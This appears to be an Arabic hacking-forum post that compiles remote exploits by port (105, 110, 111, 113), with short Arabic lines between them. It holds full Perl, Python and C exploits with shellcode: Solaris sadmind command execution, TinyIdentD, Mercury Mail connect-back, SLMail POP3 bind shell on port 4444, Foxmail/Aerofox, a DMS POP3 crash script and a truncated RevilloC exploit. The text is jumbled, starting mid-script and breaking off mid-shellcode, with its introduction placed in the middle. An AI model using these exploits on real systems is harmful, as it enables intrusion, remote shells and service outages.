my $retaddr = pack("N", 0xffbf88e0);
sub nonblock {
my ($fd) = @_;
my $flags = fcntl($fd, F_GETFL,0);
fcntl($fd, F_SETFL, $flags|O_NONBLOCK);
}
sub rpc_read {
my ($s) = @_;
my $sel = IO::Select->new($s);
my $res;
my @fds = $sel->can_read(4);
foreach (@fds) { $res .= <$s>; }
return $res;
}
sub rpc_getport {
my ($target_host, $target_port, $prog, $vers) = @_;
my $s = rpc_socket($target_host, $target_port);
my $portmap_req =
pack("L", rand() * 0xffffffff) . # XID
"\x00\x00\x00\x00". # Call
"\x00\x00\x00\x02". # RPC Version
"\x00\x01\x86\xa0". # Program Number (PORTMAP)
"\x00\x00\x00\x02". # Program Version (2)
"\x00\x00\x00\x03". # Procedure (getport)
("\x00" x 16). # Credentials and Verifier
pack("N", $prog) .
pack("N", $vers).
pack("N", 0x11). # Protocol: UDP
pack("N", 0x00); # Port: 0
print $s $portmap_req;
my $r = rpc_read($s);
close ($s);
if (length($r) == 28)
{
my $prog_port = unpack("N",substr($r, 24, 4));
return($prog_port);
}
return undef;
}
sub rpc_socket {
my ($target_host, $target_port) = @_;
my $s = IO::Socket::INET->new
(
PeerAddr => $target_host,
PeerPort => $target_port,
Proto => "udp",
Type => SOCK_DGRAM
);
if (! $s)
{
print "\nError: could not create socket to target: $!\n";
exit(0);
}
select($s); $|++;
select(STDOUT); $|++;
nonblock($s);
return($s);
}
sub rpc_sadmin_expl {
my ($hostname, $command, $first) = @_;
my $packed_host = $hostname . ("\x00" x (59 - length($hostname)));
my $rpc =
pack("L", rand() * 0xffffffff) . # XID
"\x00\x00\x00\x00". # Call
"\x00\x00\x00\x02". # RPC Version
"\x00\x01\x87\x88". # Program Number (SADMIND)
"\x00\x00\x00\x0a". # Program Version (10)
"\x00\x00\x00\x01". # Procedure
"\x00\x00\x00\x01"; # Credentials (UNIX)
# Auth Length is filled in
# pad it up to multiples of 4
my $rpc_hostname = $hostname;
while (length($rpc_hostname) % 4 != 0) { $rpc_hostname .= "\x00" }
my $rpc_auth =
# Time Stamp
pack("N", time() + 20001) .
# Machine Name
pack("N", length($hostname)) . $rpc_hostname .
"\x00\x00\x00\x00". # UID = 0
"\x00\x00\x00\x00". # GID = 0
"\x00\x00\x00\x00"; # No Extra Groups
$rpc .= pack("N", length($rpc_auth)) . $rpc_auth . ("\x00" x 8);
my $fp = pack("N", 0xffbf9108);
my $buf1 = "\x90" x (2050-length($payload)-500) . $payload . "\x90\x90" . "\x90" x 500 . "CC" . $fp . $fp . $retaddr x 100;
if ($first eq 1) {
$buf1 = "\x90" x 50;
}
while (length($buf1) % 4 != 0) { $buf1 .= "\x00" }
my $header =
# Another Time Stamp
reverse(pack("L", time() + 20005)) .
"\x00\x07\x45\xdf".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04".
"\x7f\x00\x00\x01". # 127.0.0.1
"\x00\x01\x87\x88". # SADMIND
"\x00\x00\x00\x0a\x00\x00\x00\x04".
"\x7f\x00\x00\x01". # 127.0.0.1
"\x00\x01\x87\x88". # SADMIND
"\x00\x00\x00\x0a\x00\x00\x00\x11\x00\x00\x00\x1e".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00".
"\x00\x00\x00\x3b". $packed_host.
"\x00\x00\x00\x00\x06" . "system".
"\x00\x00\x00\x00\x00\x15". "../../../../../bin/sh". "\x00\x00\x00";
# Append Body Length ^-- Here
my $body =
"\x00\x00\x00\x0e". "ADM_FW_VERSION".
"\x00\x00\x00\x00\x00\x03\x00\x00\x00\x04\x00\x00".
"\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x08". "ADM_LANG".
"\x00\x00\x00\x09\x00\x00\x00\x02\x00\x00".
"\x00\x01". "C" .
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x0d". "ADM_REQUESTID".
"\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x12\x00\x 00\x00\x11".
"00009:000000000:0"."\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x09". "ADM_CLASS".
"\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x07".
"\x00\x00\x00\x06" . "system" .
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x0e" . "ADM_CLASS_VERS" .
"\x00\x00\x00\x00\x00\x09\x00\x00\x00\x04".
"\x00\x00\x00\x03". "2.1".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x0a" . "ADM_METHOD" .
"\x00\x00\x00\x00\x00\x09" . pack("N", length($buf1)+1) . pack("N", length($buf1)) . $buf1 .
"\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x08". "ADM_HOST" .
"\x00\x00\x00\x09\x00\x00\x00\x3c\x00\x00\x00\x3b".
$packed_host.
"\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x0f". "ADM_CLIENT_HOST".
"\x00\x00\x00\x00\x09".
pack("N", length($hostname) + 1) .
pack("N", length($hostname)) .
$rpc_hostname .
"\x00\x00\x00\x00". "\x00\x00\x00\x00".
"\x00\x00\x00\x11" . "ADM_CLIENT_DOMAIN".
"\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x01\x00\x 00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x11" . "ADM_TIMEOUT_PARMS".
"\x00\x00\x00\x00\x00".
"\x00\x09\x00\x00\x00\x1c".
"\x00\x00\x00\x1b" . "TTL=0 PTO=20 PCNT=2 PDLY=30".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x09" . "ADM_FENCE" .
"\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x00\x00\x 00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x01\x58\x00\x00\x00\x00\x 00\x00\x09\x00".
"\x00\x00\x03\x00\x00\x00\x02" . "-c" .
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x 00\x01\x59\x00".
"\x00\x00\x00\x00\x00\x09\x00\x00\x02\x01\x00\x00\x 02\x00".
$command . ("\x00" x (512 - length($command))).
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10".
"netmgt_endofargs";
my $res = $rpc . $header . pack("N", (length($body) + 4 + length($header)) - 330) . $body;
return($res);
}
$|=1;
my $portmap = "111";
for (my $i=1;$i<3;$i++) {
my $target_port = rpc_getport($host, $portmap, 100232, 10);
if (! $target_port)
{
print STDERR "Error: could not determine port used by sadmind\n";
exit(0);
}
my $s = rpc_socket($host, $target_port);
my $x = rpc_sadmin_expl("localhost", "foo", $i);
print $s $x;
my $r = rpc_read($s);
close ($s);
}
# [2008-10-19]
انتهينا من بورت 111
نبداء بـ بورت 113
113 TinyIdentD <= 2.2 Remote Buffer Overflow Exploit
#
#tinyidentd exploit code by
#thomas . pollet _at_ gmail . com
#bug by Maarten Boone
#
#usage: python exploit.py [target]
#
import socket,sys
#jmp into nop sled
payload = '\xeb\x20'
#ident crap
payload += ', 28 : USERID : UNIX : '
#nop sled
payload +='XXXX'
# jmp *%esi
payload += '\x77\x13\x83\x7c' #XP kernel32.dll
#payload += '\xb1\x63\xd9\x77' #W2K rpcrt4.dll
#metasploit alphanumeric shellcode calc.exe
shellcode = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x 49\x49\x49\x49"
shellcode += "\x49\x49\x48\x49\x49\x49\x49\x49\x49\x49\x49\x49\x 51\x5a\x6a\x44"
shellcode += "\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x54\x42\x32\x 41\x42\x32\x42"
shellcode += "\x41\x30\x42\x41\x58\x41\x50\x38\x41\x42\x75\x4a\x 49\x69\x6c\x4b"
shellcode += "\x58\x51\x54\x65\x50\x57\x70\x45\x50\x4e\x6b\x67\x 35\x35\x6c\x4e"
shellcode += "\x6b\x73\x4c\x55\x55\x71\x68\x67\x71\x68\x6f\x6c\x 4b\x52\x6f\x46"
shellcode += "\x78\x4e\x6b\x51\x4f\x71\x30\x74\x41\x7a\x4b\x30\x 49\x6c\x4b\x54"
shellcode += "\x74\x6e\x6b\x76\x61\x4a\x4e\x35\x61\x4b\x70\x6a\x 39\x4c\x6c\x4d"
shellcode += "\x54\x6b\x70\x30\x74\x54\x47\x6a\x61\x6a\x6a\x64\x 4d\x63\x31\x79"
shellcode += "\x52\x4a\x4b\x69\x64\x67\x4b\x32\x74\x65\x74\x66\x 64\x31\x65\x4a"
shellcode += "\x45\x6c\x4b\x71\x4f\x31\x34\x57\x71\x48\x6b\x52\x 46\x6e\x6b\x64"
shellcode += "\x4c\x52\x6b\x4e\x6b\x31\x4f\x77\x6c\x54\x41\x68\x 6b\x4c\x4b\x57"
shellcode += "\x6c\x6c\x4b\x57\x71\x4a\x4b\x4e\x69\x41\x4c\x65\x 74\x67\x74\x4a"
shellcode += "\x63\x75\x61\x4f\x30\x51\x74\x6c\x4b\x61\x50\x50\x 30\x4f\x75\x4f"
shellcode += "\x30\x32\x58\x64\x4c\x4c\x4b\x71\x50\x54\x4c\x4c\x 4b\x70\x70\x57"
shellcode += "\x6c\x4e\x4d\x6e\x6b\x73\x58\x35\x58\x4a\x4b\x36\x 69\x6c\x4b\x4d"
shellcode += "\x50\x4c\x70\x67\x70\x75\x50\x37\x70\x4c\x4b\x45\x 38\x35\x6c\x41"
shellcode += "\x4f\x57\x41\x68\x76\x53\x50\x30\x56\x6e\x69\x6b\x 48\x6f\x73\x6f"
shellcode += "\x30\x63\x4b\x62\x70\x30\x68\x58\x70\x6f\x7a\x57\x 74\x51\x4f\x45"
shellcode += "\x38\x6f\x68\x59\x6e\x4f\x7a\x66\x6e\x62\x77\x69\x 6f\x38\x67\x73"
shellcode += "\x53\x52\x41\x30\x6c\x71\x73\x64\x6e\x35\x35\x30\x 78\x70\x65\x45"
shellcode += "\x50\x44"
nopsize=523-len(payload)-len(shellcode)
nopsled=''
for i in range(nopsize):
nopsled+='\x90'
payload=payload.replace('XXXX',nopsled+shellcode)
try:
target=sys.argv[1]
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target,113))
s.send(payload+'\n')
s.close()
print 'done'
except:
print 'usage : %s [target]'%sys.argv[0]
# [2007-05-14]
انتهينا من البورتات 105 و 110 و 111 و 113
ارجو حفظ الحقوق لجيوش الهكر
تحياتي
السلام عليكم و رحمة الله و بركاته
ان شاء الله تكونو في افضل حال
أضع بين يديكم البورتات و ثغراتها
بورت 105 و 110 و 111 و 113
نبدأ بـ بورت 105
105 Mercury Mail Transport System 4.01b Remote Exploit (PH SERVER)
### mercury***ywarez
### Okayokay THiS iS 0DAY!!!
### Mercury Mail Transport System 4.01b REMOTE ROOT EXPLOIT
### (PH SERVER)
### since me and my folks didn't find enough wild targets,
### i release this pretty warez to the public :PP
### kcope [kingcope(at)gmx.net] in 2005! JUUAREZ!
### Big thanx to blackzero,revoguard,qobaiashi,unf,secrew!
################################################## #################
use IO::Socket;
# 316 bytes
$cbsc =
"\xEB\x10\x5B\x4B\x33\xC9\x66\xB9\x25\x01\x80\x34\x 0B\xC2\xE2\xFA"
."\xEB\x05\xE8\xEB\xFF\xFF\xFF"
."\x2B\x39\xC2\xC2\xC2\x9D\xA6\x63\xF2\xC2\xC2\xC2\x 49\x82\xCE\x49"
."\xB2\xDE\x6F\x49\xAA\xCA\x49\x35\xA8\xC6\x9B\x2A\x 59\xC2\xC2\xC2"
."\x20\x3B\xAA\xF1\xF0\xC2\xC2\xAA\xB5\xB1\xF0\x9D\x 96\x3D\xD4\x49"
."\x2A\xA8\xC6\x9B\x2A\x40\xC2\xC2\xC2\x20\x3B\x43\x 2E\x52\xC3\xC2"
."\xC2\x96\xAA\xC3\xC3\xC2\xC2\x3D\x94\xD2\x92\x92\x 92\x92\x82\x92"
."\x82\x92\x3D\x94\xD6\x49\x1A\xAA\xBD\xC2\xC2\xC3\x AA\xC0\xC2\xC2"
."\xF7\x49\x0E\xA8\xD2\x93\x91\x3D\x94\xDA\x47\x02\x B7\x88\xAA\xA1"
."\xAF\xA6\xC2\x4B\xA4\xF2\x41\x2E\x96\x4F\xFE\xE6\x A8\xD7\x9B\x69"
."\x20\x3F\x04\x86\xE6\xD2\x86\x3C\x86\xE6\xFF\x4B\x 9E\xE6\x8A\x4B"
."\x9E\xE6\x8E\x4B\x9E\xE6\x92\x4F\x86\xE6\xD2\x96\x 92\x93\x93\x93"
."\xA8\xC3\x93\x93\x3D\xB4\xF2\x93\x3D\x94\xC6\x49\x 0E\xA8\x3D\x3D"
."\xF3\x3D\x94\xCA\x91\x3D\x94\xDE\x3D\x94\xCE\x93\x 94\x49\x87\xFE"
."\x49\x96\xEA\xBA\xC1\x17\x90\x49\xB0\xE2\xC1\x37\x F1\x0B\x8B\x83"
."\x6F\xC1\x07\xF1\x19\xCD\x7C\xD2\xF8\x14\xB6\xCA\x 03\x09\xCF\xC1"
."\x18\x82\x29\x33\xF9\xDD\xB7\x25\x98\x49\x98\xE6\x C1\x1F\xA4\x49"
."\xCE\x89\x49\x98\xDE\xC1\x1F\x49\xC6\x49\xC1\x07\x 69\x9C\x9B\x01"
."\x2A\xC2\x3D\x3D\x3D\x4C\x8C\xCC\x2E\xB0\x3C\x71\x D4\x6F\x1B\xC7"
."\x0C\xBC\x1A\x20\xB1\x09\x2F\x3E\xF9\x1B\xCB\x37\x 6F\x2E\x3B\x68"
."\xA2\x25\xBB\x04\xBB";
$numtargets = 1;
@targets =
(
["Mercury Mail Transport System 4.01b Win2k SP4/WinXP SP2", "\x83\xf2\x41\x00"]
);
print "Okayokay THiS iS 0DAY!!!\n";
print "Mercury Mail Transport System 4.01b REMOTE ROOT EXPLOIT\nkcope [kingcope(at)gmx.net] in 2005! JUUAREZ!\n";
print "Big thanx to blackzero,revoguard,qobaiashi,unf,secrew!\n";
if ($#ARGV ne 3) {
print "usage: mecury***ywarez.pl target targettype yourip yourport\n\n";
for ($i=0; $i<$numtargets; $i++) {
print " [".$i."]...". $targets[$i][0]. "\n";
}
exit(0);
}
$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => '105',
Proto => 'tcp') || die("Oh my godess! Port not open! Pleeze open and try again :PP");
$tt=$ARGV[1];
$cbip=$ARGV[2];
$cbport=$ARGV[3];
($a1, $a2, $a3, $a4) = split(//, gethostbyname("$cbip"));
$a1 = chr(ord($a1) ^ 0xc2);
$a2 = chr(ord($a2) ^ 0xc2);
$a3 = chr(ord($a3) ^ 0xc2);
$a4 = chr(ord($a4) ^ 0xc2);
substr($cbsc, 111, 4, $a1 . $a2 . $a3 . $a4);
($p1, $p2) = split(//, reverse(pack("s", $cbport)));
$p1 = chr(ord($p1) ^ 0xc2);
$p2 = chr(ord($p2) ^ 0xc2);
substr($cbsc, 118, 2, $p1 . $p2);
$pad="A" x 408 . $cbsc . "\x90\x90\xeb\x04";
$pad2="A" x 440;
$ret=$targets[$tt][1];
$x=$pad.$ret."JJJJKKKKLLLLMMMMNNNNOOOOPPPP\xe9\x87\xfe\xff\xff".$pad2;
print $sock "$x\r\n";
while (<$sock>) {
print;
}
# [2005-12-16]
انتهينا من بورت 105
نبداء بـ بورت 110
110 SLMail 5.5 POP3 PASS Buffer Overflow Exploit
################################################## #######
# #
# SLmail 5.5 POP3 PASS Buffer Overflow #
# Discovered by : Muts #
# Coded by : Muts #
# WWW.WHITEHAT.CO.IL #
# Plain vanilla stack overflow in the PASS command #
# #
################################################## #######
# D:\Projects\BO>SLmail-5.5-POP3-PASS.py #
################################################## #######
# D:\Projects\BO>nc -v 192.168.1.167 4444 #
# localhost.lan [192.168.1.167] 4444 (?) open #
# Microsoft Windows 2000 [Version 5.00.2195] #
# (C) Copyright 1985-2000 Microsoft Corp. #
# C:\Program Files\SLmail\System> #
################################################## #######
import struct
import socket
print "\n\n############################################## #"
print "\nSLmail 5.5 POP3 PASS Buffer Overflow"
print "\nFound & coded by muts [at] whitehat.co.il"
print "\nFor Educational Purposes Only!"
print "\n\n############################################## #"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sc = "\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x 73\x17\xe0\x66"
sc += "\x1c\xc2\x83\xeb\xfc\xe2\xf4\x1c\x8e\x4a\xc2\xe0\x 66\x4f\x97\xb6"
sc += "\x31\x97\xae\xc4\x7e\x97\x87\xdc\xed\x48\xc7\x98\x 67\xf6\x49\xaa"
sc += "\x7e\x97\x98\xc0\x67\xf7\x21\xd2\x2f\x97\xf6\x6b\x 67\xf2\xf3\x1f"
sc += "\x9a\x2d\x02\x4c\x5e\xfc\xb6\xe7\xa7\xd3\xcf\xe1\x a1\xf7\x30\xdb"
sc += "\x1a\x38\xd6\x95\x87\x97\x98\xc4\x67\xf7\xa4\x6b\x 6a\x57\x49\xba"
sc += "\x7a\x1d\x29\x6b\x62\x97\xc3\x08\x8d\x1e\xf3\x20\x 39\x42\x9f\xbb"
sc += "\xa4\x14\xc2\xbe\x0c\x2c\x9b\x84\xed\x05\x49\xbb\x 6a\x97\x99\xfc"
sc += "\xed\x07\x49\xbb\x6e\x4f\xaa\x6e\x28\x12\x2e\x1f\x b0\x95\x05\x61"
sc += "\x8a\x1c\xc3\xe0\x66\x4b\x94\xb3\xef\xf9\x2a\xc7\x 66\x1c\xc2\x70"
sc += "\x67\x1c\xc2\x56\x7f\x04\x25\x44\x7f\x6c\x2b\x05\x 2f\x9a\x8b\x44"
sc += "\x7c\x6c\x05\x44\xcb\x32\x2b\x39\x6f\xe9\x6f\x2b\x 8b\xe0\xf9\xb7"
sc += "\x35\x2e\x9d\xd3\x54\x1c\x99\x6d\x2d\x3c\x93\x1f\x b1\x95\x1d\x69"
sc += "\xa5\x91\xb7\xf4\x0c\x1b\x9b\xb1\x35\xe3\xf6\x6f\x 99\x49\xc6\xb9"
sc += "\xef\x18\x4c\x02\x94\x37\xe5\xb4\x99\x2b\x3d\xb5\x 56\x2d\x02\xb0"
sc += "\x36\x4c\x92\xa0\x36\x5c\x92\x1f\x33\x30\x4b\x27\x 57\xc7\x91\xb3"
sc += "\x0e\x1e\xc2\xf1\x3a\x95\x22\x8a\x76\x4c\x95\x1f\x 33\x38\x91\xb7"
sc += "\x99\x49\xea\xb3\x32\x4b\x3d\xb5\x46\x95\x05\x88\x 25\x51\x86\xe0"
sc += "\xef\xff\x45\x1a\x57\xdc\x4f\x9c\x42\xb0\xa8\xf5\x 3f\xef\x69\x67"
sc += "\x9c\x9f\x2e\xb4\xa0\x58\xe6\xf0\x22\x7a\x05\xa4\x 42\x20\xc3\xe1"
sc += "\xef\x60\xe6\xa8\xef\x60\xe6\xac\xef\x60\xe6\xb0\x eb\x58\xe6\xf0"
sc += "\x32\x4c\x93\xb1\x37\x5d\x93\xa9\x37\x4d\x91\xb1\x 99\x69\xc2\x88"
sc += "\x14\xe2\x71\xf6\x99\x49\xc6\x1f\xb6\x95\x24\x1f\x 13\x1c\xaa\x4d"
sc += "\xbf\x19\x0c\x1f\x33\x18\x4b\x23\x0c\xe3\x3d\xd6\x 99\xcf\x3d\x95"
sc += "\x66\x74\x32\x6a\x62\x43\x3d\xb5\x62\x2d\x19\xb3\x 99\xcc\xc2"
#Tested on Win2k SP4 Unpatched
# Change ret address if needed
buffer = '\x41' * 4654 + struct.pack('<L', 0x783d6ddf) + '\x90'*32 + sc
try:
print "\nSending evil buffer..."
s.connect(('192.168.1.167',110))
data = s.recv(1024)
s.send('USER username' +'\r\n')
data = s.recv(1024)
s.send('PASS ' + buffer + '\r\n')
data = s.recv(1024)
s.close()
print "\nDone! Try connecting to port 4444 on victim machine."
except:
print "Could not connect to POP3!"
# [2004-11-18]
110 DMS POP3 Server (1.5.3 build 37) Buffer Overflow Exploit
#===== Start DMS_POP3_Overflow.pl =====
#
# Usage: DMS_POP3_Overflow.pl <ip> <port>
# DMS_POP3_Overflow.pl 127.0.0.1 110
#
# DMS POP3 Server for Windows 2000/XP 1.5.3 build 37
#
# Download:
# http://www.digitalmapping.sk.ca/pop3srv/default.asp
#
# Patch:
# http://www.digitalmapping.sk.ca/pop3srv/Update.asp
#
################################################## ###
use IO::Socket;
use strict;
my($socket) = "";
if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => $ARGV[1],
Proto => "TCP"))
{
print "Attempting to kill DMS POP3 service at $ARGV[0]:$ARGV[1]...";
sleep(1);
print $socket "USER " . "A" x 1023;
close $socket;
sleep(1);
if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => $ARGV[1],
Proto => "TCP"))
{
close $socket;
print "failed!\n";
}
else
{
print "successful!\n";
}
}
else
{
print "Cannot connect to $ARGV[0]:$ARGV[1]\n";
}
# [2004-11-21]
110 Foxmail 1.1.0.1 POP3 Temp Dir Stack Overflow Exploit
#include <winsock.h>
#include <windows.h>
#include <stdio.h>
#include <conio.h>
#pragma comment (lib,"ws2_32")
#define PORT_OFFSET 118
#define IP_OFFSET 111
char Shellcode[] = "\xEB\x10\x5B\x4B\x33\xC9\x66\xB9\x25\x01\x80\x34\x 0B\x99\xE2\xFA"
"\xEB\x05\xE8\xEB\xFF\xFF\xFF"
"\x70\x62\x99\x99\x99\xC6\xFD\x38\xA9\x99\x99\x99\x 12\xD9\x95\x12"
"\xE9\x85\x34\x12\xF1\x91\x12\x6E\xF3\x9D\xC0\x71\x 02\x99\x99\x99"
"\x7B\x60\xF1\xAA\xAB\x99\x99\xF1\xEE\xEA\xAB\xC6\x CD\x66\x8F\x12"
"\x71\xF3\x9D\xC0\x71\x1B\x99\x99\x99\x7B\x60\x18\x 75\x09\x98\x99"
"\x99\xCD\xF1\x98\x98\x99\x99\x66\xCF\x89\xC9\xC9\x C9\xC9\xD9\xC9"
"\xD9\xC9\x66\xCF\x8D\x12\x41\xF1\xE6\x99\x99\x98\x F1\x9B\x99\x99"
"\xAC\x12\x55\xF3\x89\xC8\xCA\x66\xCF\x81\x1C\x59\x EC\xD3\xF1\xFA"
"\xF4\xFD\x99\x10\xFF\xA9\x1A\x75\xCD\x14\xA5\xBD\x F3\x8C\xC0\x32"
"\x7B\x64\x5F\xDD\xBD\x89\xDD\x67\xDD\xBD\xA4\x10\x C5\xBD\xD1\x10"
"\xC5\xBD\xD5\x10\xC5\xBD\xC9\x14\xDD\xBD\x89\xCD\x C9\xC8\xC8\xC8"
"\xF3\x98\xC8\xC8\x66\xEF\xA9\xC8\x66\xCF\x9D\x12\x 55\xF3\x66\x66"
"\xA8\x66\xCF\x91\xCA\x66\xCF\x85\x66\xCF\x95\xC8\x CF\x12\xDC\xA5"
"\x12\xCD\xB1\xE1\x9A\x4C\xCB\x12\xEB\xB9\x9A\x6C\x AA\x50\xD0\xD8"
"\x34\x9A\x5C\xAA\x42\x96\x27\x89\xA3\x4F\xED\x91\x 58\x52\x94\x9A"
"\x43\xD9\x72\x68\xA2\x86\xEC\x7E\xC3\x12\xC3\xBD\x 9A\x44\xFF\x12"
"\x95\xD2\x12\xC3\x85\x9A\x44\x12\x9D\x12\x9A\x5C\x 32\xC7\xC0\x5A"
"\x71\x99\x66\x66\x66\x17\xD7\x97\x75\xEB\x67\x2A\x 8F\x34\x40\x9C"
"\x57\xE7\x41\x7B\xEA\x52\x74\x65\xA2\x40\x90\x6C\x 34\x75\x60\x33"
"\xF9\x7E\xE0\x5F\xE0";
char szUser[] = "user 1231231231231234567890abcdefghijklmnopqrstuvwxyz12 34567890a"
"bcdefghijklmnopqrstuvwxyz1234567890abcdefghijklmno pqrstuvwxyz123"
"4567890abcdefghijklmnopqrstuvwxyz1234567890abcdefg hijkklmnopqrst"
"uvwxyz1234567890abcdefghijkklmnopqrstuvwxyz1234567 890abcdAAAAijk"
"lmnopqrstuvwxyz1234567890abcdefghijklmnopqrstuvwxy z1234567890abc"
"defghijklmnopqrstuvwxyz1234567890abcdefghijklmnopq rstuvwxyz12345"
"67890abcdefghijklmnopqrstuvwxyz1234567890abcdefghi jklmnopqrstuvw"
"xyz1234567890abcdefghijklmnopqrstuvwxyz1234567890a bcdefghijklmno"
"pqrstuvwxyz1234567890abcdefghijklmnopqrstuvwxyz123 4567890abcdefg"
"hijklmnopqrstuvwxyz1234567890abcdefghijklmnopqrstu vwxyz123456789"
"0abcdefghijklmnopqrstuvwxyz1234567890abcdefghijklm nopqrstuvwxyz1"
"234567890abcdefghijklmnopqrstuvwxyz1234567890abcde fghijklmnopqrs"
"tuvwxyz1234567890abcdefghijklmnopqrstuvwxyz1234567 890abcdefghijk"
"lmnopqrstuvwxyz1234567890abcdefghijklmnopqrstuvwxy z1234567890abc"
"defghijklmnopqrstuvwxyz1234567890abcdefghijklmnopq rstuvwxyz12345"
"67890abcdefghijklmnopqrstuvwxyz1234567890abcdefghi jklmnopqrstuvw"
"xyz1234567890abcdefghijklmnopqrstuvwxyz1234567890a bcdefghijklmno"
"pqrstuvwxyz1234567890abcdefghijklmnopqrstuvwxyz123 4567890abcdefg"
"hijklmnopqrstuvwxyz\r\n";
unsigned char szPass[] = "pass siglos\r\n";
void help(char *program)
{
printf ("================================================== ======\r\n");
printf ("Aerofox Mail Server 1.1.0.1 POP3 Temp Dir Stack Overflow\r\n");
printf ("================================================== ======\r\n\r\n");
printf ("Usage: %s <Host> <Your IP> <Your port>\r\n", program);
printf ("e.g.:\r\n");
printf (" %s 127.0.0.1 202.119.9.42 8111\r\n", program);
printf ("\r\n The ret address is 0x7ffa1571.\r\n");
exit(0);
}
SOCKET Connect(char *u_host ,unsigned short u_port)
{
WSADATA wsaData;
SOCKET sock;
struct hostent *r;
struct sockaddr_in r_addr;
int timeout = 1000;
if(WSAStartup(0x0101,&wsaData) != 0)
{
printf("error starting winsock..");
return -1;
}
if((r=gethostbyname(u_host))== NULL)
{
return -1 ;
}
if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))= = INVALID_SOCKET)
{
return -1 ;
}
r_addr.sin_family=AF_INET;
r_addr.sin_port=htons(u_port);
r_addr.sin_addr=*((struct in_addr*)r->h_addr);
if(connect(sock,(struct sockaddr *)&r_addr,sizeof(r_addr))==SOCKET_ERROR)
{
printf("Can't connect\n");
exit(-1);
}
setsockopt(sock, SOL_SOCKET, SO_RCVTIMEO, (char*)&timeout,sizeof(timeout));
return(sock);
}
void Disconnect(SOCKET s)
{
closesocket(s);
WSACleanup();
}
void tr(SOCKET s)
{
char buff[1500];
memset(buff, 0, sizeof(buff));
recv(s, buff, sizeof(buff), 0);
printf("%s\r\n",buff);
}
void SlowSend(SOCKET s, char *buf, int p)
{
//send(s, buf, sizeof(buf),0);
//send(s, "\r\n", 2,0);
for(unsigned int i = 0; i < strlen(buf); i++)
{
Sleep(p);
printf("%c", buf[i]);
send(s, (char*)&(buf[i]), 1, 0);
}
}
void main(int argc, char *argv[])
{
/*_asm{
mov eax,90909091h
dec eax
a: dec ebx
cmp [ebx], eax
jnz a
push ebx
ret
}*/
if(argc != 4)
help(argv[0]);
unsigned short port;
unsigned long ip;
port = htons(atoi(argv[3]))^(USHORT)0x9999;
ip = inet_addr(argv[2])^(ULONG)0x99999999;
memcpy(&Shellcode[PORT_OFFSET], &port, 2);
memcpy(&Shellcode[IP_OFFSET], &ip, 4);
SOCKET s = Connect(argv[1], 110);
tr(s);
memcpy(szUser + 244, "\xCC\x90\xEB\x04\x71\x15\xFA\x7F", 8);
memcpy(szUser + 244 + 8, "\xB8\x91\x90\x90\x90\x48\x4B\x39\x03\x75\xFB\x53\x C3\x90\x90\x90\x90", 17);
memcpy(szUser + 244 + 8 + 17, Shellcode, sizeof(Shellcode) - 1);
SlowSend(s, (char*)szUser, 1);
getch();
tr(s);
SlowSend(s, (char*)szPass, 100);
tr(s);
Disconnect(s);
return;
}
// [2005-03-02]
110 RevilloC MailServer 1.21 (USER) Remote Buffer Overflow Exploit PoC
#!/usr/bin/perl -w
#revilloC mail server PoC exploit ( for xp sp1)
# Discovered securma massine from MorX Security Research Team (http://www.morx.org).
#RevilloC is a MailServer and Proxy v 1.21 (http://www.revilloC.com)
#The mail server is a central point for emails coming in and going out from home or office
#The service will work with any standard email client that supports POP3 and SMTP.
#by sending a large buffer after USER commands
#C:\>nc 127.0.0.1 110
#+OK RevilloC POP3 Ready
#USER "A" x4081 + "\xff"x4 + "\xdd"x4 + "\x0d\x0a" (xp sp2)
#we have:
#access violation when reading [dddddddd].
#ntdll!wcsncat+0x387:
#7C92B3FB 8B0B MOV ECX,DWORD PTR DS:[EBX] --->EBX pointe to "\xdd"x4
#ECX dddddddd
#EAX FFFFFFFF
#Vendor contacted 14/01/2006 , No response,No patch.
#this entire document is for eductional, testing and demonstrating purpose only.
#greets all MorX members,undisputed,sara
#!/usr/bin/perl -w
use IO::Socket;
if ($#ARGV<0)
{
print "\n write the target IP!! \n\n";
exit;
}
$shellcode = "\xEB\x03\x5D\xEB\x05\xE8\xF8\xFF\xFF\xFF\x8B\xC5\x 83\xC0\x11\x33".
"\xC9\x66\xB9\xC9\x01\x80\x30\x88\x40\xE2\xFA\xDD\x 03\x64\x03\x7C".
"\x09\x64\x08\x88\x88\x88\x60\xC4\x89\x88\x88\x01\x CE\x74\x77\xFE".
